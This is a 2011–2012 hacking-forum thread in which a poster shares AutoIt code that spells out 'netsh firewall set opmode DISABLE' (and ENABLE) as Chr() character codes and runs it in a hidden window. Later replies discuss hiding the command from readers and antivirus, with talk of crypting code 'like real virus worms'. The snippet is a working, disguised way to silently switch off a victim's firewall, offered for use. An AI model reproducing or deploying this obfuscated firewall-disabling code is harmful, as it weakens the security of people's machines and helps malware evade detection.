![]() |
|
[AutoIt]Another method to stop/start the firewall - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Coding (https://sinister.li/Forum-Coding--71) +--- Thread: [AutoIt]Another method to stop/start the firewall (/Thread-AutoIt-Another-method-to-stop-start-the-firewall) Pages:
1
2
|
[AutoIt]Another method to stop/start the firewall - 1234hotmaster - 11-07-2011 Disable: Code: RunWait(Chr(110)&Chr(101)&Chr(116)&Chr(115)& _
Chr(104)&Chr(32)&Chr(102)&Chr(105)&Chr(114)& _
Chr(101)&Chr(119)&Chr(97)&Chr(108)&Chr(108)& _
Chr(32)&Chr(115)&Chr(101)&Chr(116)&Chr(32)& _
Chr(111)&Chr(112)&Chr(109)&Chr(111)&Chr(100)& _
Chr(101)&Chr(32)&Chr(68)&Chr(73)&Chr(83)& _
Chr(65)&Chr(66)&Chr(76)&Chr(69),Chr(0),@SW_HIDE)Enable: Code: RunWait(Chr(110)&Chr(101)&Chr(116)&Chr(115)& _
Chr(104)&Chr(32)&Chr(102)&Chr(105)&Chr(114)& _
Chr(101)&Chr(119)&Chr(97)&Chr(108)&Chr(108)& _
Chr(32)&Chr(115)&Chr(101)&Chr(116)&Chr(32)& _
Chr(111)&Chr(112)&Chr(109)&Chr(111)&Chr(100)& _
Chr(101)&Chr(32)&Chr(69)&Chr(78)&Chr(65)& _
Chr(66)&Chr(76)&Chr(69),Chr(0),@SW_HIDE)RE: [AutoIt]Another method to stop/start the firewall - Golliath808 - 11-07-2011 How can I decrypt this code ,to see the source code? btw great job
RE: [AutoIt]Another method to stop/start the firewall - 1234hotmaster - 11-08-2011 (11-07-2011, 10:44 PM)Golliath808 Wrote: How can I decrypt this code ,to see the source code? btw great job I'll make a method for you soon ![]() after i make the tripple-DES-Binary-Hex encryption >
RE: [AutoIt]Another method to stop/start the firewall - spymare - 09-23-2012 sorry for asking stupid, (I just tested it and it works) but I got no idea how it works, what is all this: (Chr(110)&Chr(101)&Chr(116)&Chr(115)& _ Chr(104)&Chr(32)&Chr(102)&Chr(105)&Chr(114)& _ Chr(101)&Chr(119)&Chr(97)&Chr(108)&Chr(108)& _ Chr(32)&Chr(115)&Chr(101)&Chr(116)&Chr(32)& _ Chr(111)&Chr(112)&Chr(109)&Chr(111)&Chr(100)& _ Chr(101)&Chr(32)&Chr(68)&Chr(73)&Chr(83)& _ Chr(65)&Chr(66)&Chr(76)&Chr(69),Chr(0) what does it do, and what is all the numbers for, please explain
RE: [AutoIt]Another method to stop/start the firewall - 1234hotmaster - 09-23-2012 http://www.hackcommunity.com/Thread-AutoIt-String-to-Chr-converter RE: [AutoIt]Another method to stop/start the firewall - spymare - 09-23-2012 hi 1234hotmaster thanks alot what a great tool you have made, will be using that alot.what is most secure, to use it with the option "reverse hex" or without? RE: [AutoIt]Another method to stop/start the firewall - 1234hotmaster - 09-24-2012 Obviously, "With". Btw lets not be offtopic on others posts too
RE: [AutoIt]Another method to stop/start the firewall - thmaster100 - 09-24-2012 Nice Encyption and there is easy way to creat Decryption too :) *censored* RE: [AutoIt]Another method to stop/start the firewall - 1234hotmaster - 09-24-2012 (09-24-2012, 05:08 PM)thmaster100 Wrote: Nice Encyption and there is easy way to creat Decryption too Well I didn't ask for anyone to post it decrypted because that would ruin the purpose of encrypting it in the first place :oO: RE: [AutoIt]Another method to stop/start the firewall - thmaster100 - 09-25-2012 (09-24-2012, 10:55 PM)1234hotmaster Wrote:(09-24-2012, 05:08 PM)thmaster100 Wrote: Nice Encyption and there is easy way to creat Decryption too at least crypt something that av detect like real virus worms don't me angry dude I used to code for long time :dance: |